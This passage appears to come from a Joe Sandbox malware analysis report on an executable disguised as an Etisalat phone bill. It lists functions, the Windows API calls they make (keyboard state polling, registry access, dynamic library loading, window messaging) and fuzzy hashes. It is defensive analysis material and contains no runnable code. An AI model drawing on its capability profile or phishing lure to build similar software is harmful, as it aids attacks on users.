                                      • Opcode Fuzzy Hash: dfecb6459543d7830a3056005005317f391a66b0b8861e0d6d14b692e9c1971f
                                      • Instruction Fuzzy Hash: 0C217130A00149AFCB10EF65C885EEE7BF8EF89704B0440A9F909EB251DB31EA41CB21
                                      Function 00BBA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                        • Part of subcall function 00BBA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BBA399
                                        • Part of subcall function 00BBA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00BBA3AC
                                        • Part of subcall function 00BBA37C: GetCurrentThreadId.KERNEL32 ref: 00BBA3B3
                                        • Part of subcall function 00BBA37C: AttachThreadInput.USER32(00000000), ref: 00BBA3BA
                                      • GetFocus.USER32 ref: 00BBA554
                                        • Part of subcall function 00BBA3C5: GetParent.USER32(?), ref: 00BBA3D3
                                      • GetClassNameW.USER32(?,?,00000100), ref: 00BBA59D
                                      • EnumChildWindows.USER32(?,00BBA615), ref: 00BBA5C5
                                      • __swprintf.LIBCMT ref: 00BBA5DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      • Opcode ID: b82630972b132170ebbc2e8f87d6ceeea2b4c4f3ba71c4ba519a205ad9fbcb16
                                      • Instruction ID: 5b5ad6f5fd86d206e9f68f19862435a5fe562eac1ac6ac50f8c45bb3fbb6f0e9
                                      • Opcode Fuzzy Hash: b82630972b132170ebbc2e8f87d6ceeea2b4c4f3ba71c4ba519a205ad9fbcb16
                                      • Instruction Fuzzy Hash: DC11A2B1A402097BDF107F60DC85FFA37F8EF48700F0440B5BA19AA152CAB099458B75
                                      Function 00BC2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00BC2048
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharUpper
                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                      • API String ID: 3964851224-769500911
                                      • Opcode ID: ac5bbc021987b92939f67f61c38797c63cae124255aa257684eca31613ab0964
                                      • Instruction ID: 2b3d1e6773d1c058b8d5789cb2d23332b873c73b5894eaec86e71e7a564fbd08
                                      • Opcode Fuzzy Hash: ac5bbc021987b92939f67f61c38797c63cae124255aa257684eca31613ab0964
                                      • Instruction Fuzzy Hash: F1115E7091010AEFCF40FFA4D8919FEB7F5FF16304B1084A9D8656B261DB32690ADB50
                                      Function 00BDEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BDEF1B
                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BDEF4B
                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BDF07E
                                      • CloseHandle.KERNEL32(?), ref: 00BDF0FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                      • String ID:
                                      • API String ID: 2364364464-0
                                      • Opcode ID: 3e37fee12293cb5c9caf4932a90143b379c2172c2fad7f8a77df55f0817b7fb9
                                      • Instruction ID: 408af35195b61170ea96ccfb16f42bb3c255cf6bd75a27d35e5edb00f49de533
                                      • Opcode Fuzzy Hash: 3e37fee12293cb5c9caf4932a90143b379c2172c2fad7f8a77df55f0817b7fb9
                                      • Instruction Fuzzy Hash: 198152716043019FD720EF28C886F6AB7E5EF48710F1489ADF59ADB392DB75AC408B51
                                      Function 00BE02C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                        • Part of subcall function 00BE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BE0038,?,?), ref: 00BE10BC
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BE0388
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BE03C7
                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BE040E
                                      • RegCloseKey.ADVAPI32(?,?), ref: 00BE043A
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00BE0447
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                      • String ID:
                                      • API String ID: 3440857362-0
                                      • Opcode ID: f03cb93e2d3d96fcc7bfcd524c1f4716c428e9ba197b8dbb2b3dc5cab472508a
                                      • Instruction ID: 481140609f13aad5317454e26fd79cb3647fa44640bfccbe37471dd1ccc85dde
                                      • Opcode Fuzzy Hash: f03cb93e2d3d96fcc7bfcd524c1f4716c428e9ba197b8dbb2b3dc5cab472508a
                                      • Instruction Fuzzy Hash: DD515831218245AFD714EF65C881E6EB7F8FF88304F0489ADB5958B2A2DB74ED44CB52
                                      Function 00BDDBDC Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BDDC3B
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00BDDCBE
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BDDCDA
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00BDDD1B
                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BDDD35
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                      • String ID:
                                      • API String ID: 327935632-0
                                      • Opcode ID: 4c48ece8157ee90a4c28fb60bdf9af3e190747e7a8306e23ade0f9bd1d1437aa
                                      • Instruction ID: 9b295505467d78cdbea1152685b7af2cf540411ba917eac0d70da1519e81bebe
                                      • Opcode Fuzzy Hash: 4c48ece8157ee90a4c28fb60bdf9af3e190747e7a8306e23ade0f9bd1d1437aa
                                      • Instruction Fuzzy Hash: 67511835A00609DFCB10EFA8C484DADF7F5FF58310B1880AAE959AB351DB74AD45CB91
                                      Function 00BCE7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BCE88A
                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BCE8B3
                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BCE8F2
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BCE917
                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BCE91F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                      • String ID:
                                      • API String ID: 1389676194-0
                                      • Opcode ID: 0939e4c4475d8d9d152a0cd602c30e94ef84c251462e53a0022d10498c7a9ad8
                                      • Instruction ID: 2c4eaea0b87bb8c71fa6ac322e2b6b66ca42a1c2b218b5fc9d370126f9621105
                                      • Opcode Fuzzy Hash: 0939e4c4475d8d9d152a0cd602c30e94ef84c251462e53a0022d10498c7a9ad8
                                      • Instruction Fuzzy Hash: ED510B35A00205DFCF11EF64C981AAEBBF9FF48310B1880A9E949AB361CB35ED51DB51
                                      Function 00BEA2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3659948afb48c3d8c9becee6bc001af290fccfa7410e2fe3d180065dd0a1567c
                                      • Instruction ID: 821f6f050f502ca92e5ae6ba269c272921ce227f27972ce78793c597f17d7844
                                      • Opcode Fuzzy Hash: 3659948afb48c3d8c9becee6bc001af290fccfa7410e2fe3d180065dd0a1567c
                                      • Instruction Fuzzy Hash: E341F335900284AFD720DF29CC88FA9BBFCEB09310F1442A5F856A72E1CB70BD41DA65
                                      Function 00B62344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 00B62357
                                      • ScreenToClient.USER32(00C267B0,?), ref: 00B62374
                                      • GetAsyncKeyState.USER32(00000001), ref: 00B62399
                                      • GetAsyncKeyState.USER32(00000002), ref: 00B623A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AsyncState$ClientCursorScreen
                                      • String ID:
                                      • API String ID: 4210589936-0
                                      • Opcode ID: 5f07ad96af249747d1adfb570898092ee645ebe57227c697ac0d518f7f29a239
                                      • Instruction ID: 75949cc1f59f391ea219f76b3979d51a252b9d9ac1ba29ccb48b658978469104
                                      • Opcode Fuzzy Hash: 5f07ad96af249747d1adfb570898092ee645ebe57227c697ac0d518f7f29a239
                                      • Instruction Fuzzy Hash: 84418F35504659FFDF159F68C884AE9BBF4FB05360F2043AAF82896290C7349D50DF95
                                      Function 00BB6920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB695D
                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00BB69A9
                                      • TranslateMessage.USER32(?), ref: 00BB69D2
                                      • DispatchMessageW.USER32(?), ref: 00BB69DC
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BB69EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Message$PeekTranslate$AcceleratorDispatch
                                      • String ID:
                                      • API String ID: 2108273632-0
                                      • Opcode ID: fb0c24059dfe38f8c7188c4d3f092516ec6128527be38d22903fdd0db7203e83
                                      • Instruction ID: 5ff602a5b4f7d2898001348d6b0e56819354448d8c60e3dd1465ef5f784b153c
                                      • Opcode Fuzzy Hash: fb0c24059dfe38f8c7188c4d3f092516ec6128527be38d22903fdd0db7203e83
                                      • Instruction Fuzzy Hash: 3C31E031900246AFDB208F74DC84BFA7BE8EB19300F1441A9E461D75A0D7B8DC8ADBA0
                                      Function 00BB8F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00BB8F12
                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00BB8FBC
                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00BB8FC4
                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00BB8FD2
                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00BB8FDA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessagePostSleep$RectWindow
                                      • String ID:
                                      • API String ID: 3382505437-0
                                      • Opcode ID: 0959c9dc9d6d50c57cbba3de1ee2e08a3264a80eeeda90071f5083762359a348
                                      • Instruction ID: 5b6549c1a07e21bba494f6aad724cb40f1ed681b2b38fd4b6d62d6efc71b162c
                                      • Opcode Fuzzy Hash: 0959c9dc9d6d50c57cbba3de1ee2e08a3264a80eeeda90071f5083762359a348
                                      • Instruction Fuzzy Hash: 4431DC7150021AEFDF00CF68D988AFE7BBAEB44315F104669F924AB1D0CBB09914CB91
                                      Function 00BBB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00BBB6C7
                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00BBB6E4
                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00BBB71C
                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00BBB742
                                      • _wcsstr.LIBCMT ref: 00BBB74C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                      • String ID:
                                      • API String ID: 3902887630-0
                                      • Opcode ID: e4b6df372096d5862972b954d40e446f6dda940e0df94ff82fa69f75bf56607c
                                      • Instruction ID: 480c7ced3117c4d2912689f296f79d2b83b17c6820d4df832c0232a7b3a848f1
                                      • Opcode Fuzzy Hash: e4b6df372096d5862972b954d40e446f6dda940e0df94ff82fa69f75bf56607c
                                      • Instruction Fuzzy Hash: DA21C532204244BBEB256B7ADC89EBB7BD8DF85750F1040A9F805CA1A1EFE1DC41D760
                                      Function 00BB97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB9802
                                        • Part of subcall function 00B67D2C: _memmove.LIBCMT ref: 00B67D66
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB9834
                                      • __itow.LIBCMT ref: 00BB984C
                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00BB9874
                                      • __itow.LIBCMT ref: 00BB9885
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$__itow$_memmove
                                      • String ID:
                                      • API String ID: 2983881199-0
                                      • Opcode ID: 18d29fd0d5f57da9fa5daf8688585caf48ad34ddf6ae8d036a591670f15a1380
                                      • Instruction ID: 2727ac63fde9e02002b8729562e59d22039a0c31b0f33eb58773697361e1f807
                                      • Opcode Fuzzy Hash: 18d29fd0d5f57da9fa5daf8688585caf48ad34ddf6ae8d036a591670f15a1380
                                      • Instruction Fuzzy Hash: 5221F531B00244BBDB10AA618C86EFE3BE8EF4A750F0400B4FA04DB251DAB1CD45C791
                                      Function 00B612F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                      • SelectObject.GDI32(?,00000000), ref: 00B6135C
                                      • BeginPath.GDI32(?), ref: 00B61373
                                      • SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ObjectSelect$BeginCreatePath
                                      • String ID:
                                      • API String ID: 3225163088-0
                                      • Opcode ID: 6440cca4a297e6e8755e0ea2b80578e6120f7a0549954c5df703c474f3558cb1
                                      • Instruction ID: 61288e75f9d9a4e33feda8b67343a85604f989a68b56645675af7a042d180911
                                      • Opcode Fuzzy Hash: 6440cca4a297e6e8755e0ea2b80578e6120f7a0549954c5df703c474f3558cb1
                                      • Instruction Fuzzy Hash: 8221CF70810308EFDB218F29ED447AD7BF8FB00321F188666F81196AE1D7759992DFA4
                                      Function 00BBC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 1ee863d3f6a558cda19472a971aab69304f109acf6bb35ed3c9cacb2f080e0fb
                                      • Instruction ID: 4e609d13dac3dff01f9b15d6bf2d6216db93f9d6dd64075395feab9aa2d1b774
                                      • Opcode Fuzzy Hash: 1ee863d3f6a558cda19472a971aab69304f109acf6bb35ed3c9cacb2f080e0fb
                                      • Instruction Fuzzy Hash: B301967160610A7BD204F62C5C42EFB6BDCDF11394B0440A1FE04B7263F7A09E16C2A4
                                      Function 00BC4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00BC4D5C
                                      • __beginthreadex.LIBCMT ref: 00BC4D7A
                                      • MessageBoxW.USER32(?,?,?,?), ref: 00BC4D8F
                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00BC4DA5
                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00BC4DAC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                      • String ID:
                                      • API String ID: 3824534824-0
                                      • Opcode ID: f4924e3c2e014e6c0188ffa39177d79b0f737a50c278fe242175fbc458ef13da
